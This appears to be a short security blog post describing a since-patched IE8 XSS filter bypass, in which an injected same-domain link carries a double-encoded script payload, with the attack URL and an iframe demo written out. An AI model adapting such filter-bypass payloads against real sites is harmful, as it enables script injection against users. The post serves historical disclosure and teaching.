IE8 XSS Filter Bypass via Injected Referrer Link

The IE8 XSS filter skips its checks when the request’s referrer is the same domain as the target URL. By injecting a link in the first request that points back to the same vulnerable endpoint — with the actual XSS payload double-encoded in the href — clicking the injected link satisfies the referrer condition and the filter lets the script through.

<!-- The two-step attack URL -->
<!-- Step 1: inject a link -->
http://www.cracking.com.ar/redir/echo.php?xss=<a href="echo.php?xss=ENCODED_SCRIPT_TAGS alert(location) ENCODED_CLOSE_TAGS" target=_top>I AM AN INJECTED LINK</a>

<!-- Step 2: the injected link, when clicked, makes a same-domain request
     with the real <script>alert(location)</script> payload,
     which the filter allows because the referrer matches -->

<!-- Working demo in an iframe -->
<iframe src='http://www.cracking.com.ar/redir/echo.php?xss=<a href=echo.php?xss=%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45alert(location)%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45 target=_top>I AM AN INJECTED LINK. Click me to bypass the XSS Filter</a>' width="600"></iframe>

The key insight: the XSS filter allows script injection when the request originates from the same domain as the page being loaded. A two-hop approach — first inject an anchor, then have the user click it — satisfies that condition while the actual payload stays hidden in the first response as a harmless-looking link.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE Resident Script via createElement OBJECT Self-Reference] :: [IE8 DoS — XAML insertObject Crash] >